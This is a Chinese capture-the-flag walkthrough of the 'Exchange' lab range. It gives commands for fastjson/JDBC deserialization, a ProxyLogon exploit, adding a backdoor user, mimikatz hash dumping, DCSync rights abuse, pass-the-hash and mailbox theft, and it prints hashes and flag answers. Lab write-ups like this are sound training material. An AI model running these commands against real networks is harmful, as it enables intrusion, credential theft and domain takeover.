渗透
春秋云镜-Exchange
flag01
fscan扫一下
1 | fscan -h 39.98.120.143 |
8000端口有个华夏 ERP的cms。可以利用/user/getAllList;.ico
这个未授权接口获取密码的哈希,或者直接弱口令admin/123456进入后台
Java 代码审计之华夏 ERP CMS v2.3 - FreeBuf网络安全行业门户
然后fastjson打jdbc反序列化拿shell
一开始用的evil-mysql-server,能执行命令,但是一直弹不到shell
1 | ./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial.jar |
后面改用MySQL_Fake_Server,但是这个好像要python3.8以下才能用,还好有师傅已经解决了这个问题@coroutine has deprecated since python3.8
这是我的配置文件
http请求包
1 | GET /depotHead/list?search={{url({ |
flag01: flag{8aaa35a9-9f53-417e-868f-1c53bc9aea9d}
flag02
搭代理,扫内网
1 | ./fscan -h 172.22.3.12/24 |
看看有什么靶机
172.22.3.2 DC
172.22.3.9 XIAORANG-EXC01.xiaorang.lab (邮件服务器
172.22.3.12 外网(已拿下)
172.22.3.26 XIAORANG\XIAORANG-PC
172.22.3.9是个exchange,我们直接用Proxylogin进行攻击 FDlucifer/Proxy-Attackchain
1 | proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab |
拿到system权限。
加一个账号进去
1 | net user fffffilm Password@973 /add |
远程rdp进去拿flag
flag02: flag{e27b65a6-f2fa-4c39-bc62-a3a606b28c1b}
flag04
上mimikazt抓一下哈希
1 | C:\Users\fffffilm\Desktop>mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" exit |
里面有两个用户的哈希
1 | * Username : Zhangtong |
然后bloodhound做一下信息收集
1 | ┌──(root㉿kali)-[~/Desktop/tools/BloodHound-python] |
发现exchange这台机器有WriteDacl权限,我们直接给自己dsync权限,然后就可以dump到域管哈希了。使用Exchange服务器中的Writedacl实现域提权的提权
1 | proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :535602bb7f4523e2979148feee2cc749 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2 |
修改成功
但是尝试的时候发现dump不下来哈希。(可能是要重新登录一下,后面发现我rdp的是fffffilm用户但是加的是XIAORANG-EXC01$,所以dump不下来
最后还是选择给Zhangtong用户dsync权限拿到哈希。
1 | #加权限 |
打PTH
1 | proxychains impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.2 -codec gbk |
flag04: flag{03c367e2-684f-41d2-9880-4545f0a92d98}
flag03
刚刚导出哈希的时候拿到了Lumia用户的哈希,直接用pthExchange下载所有的邮件。PTH_Exchange
1 | proxychains python3 pthexchange.py --target https://172.22.3.9 --username "Lumia" --password "aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296" --action Download |
拿到两封邮件,一个有个secret.zip,另一个是一个csv文件,里面有名字和电话号。
这里还说用电话号码加密压缩包,所以提取出电话号码然后爆破zip就行了。
让gpt写个代码
1 | import csv |
拿到密码18763918468
得到flag
flag03: flag{cf0c753c-233f-4729-8984-0746ea5878b7}
参考文章
【内网渗透】最保姆级的春秋云镜Exchange打靶笔记-CSDN博客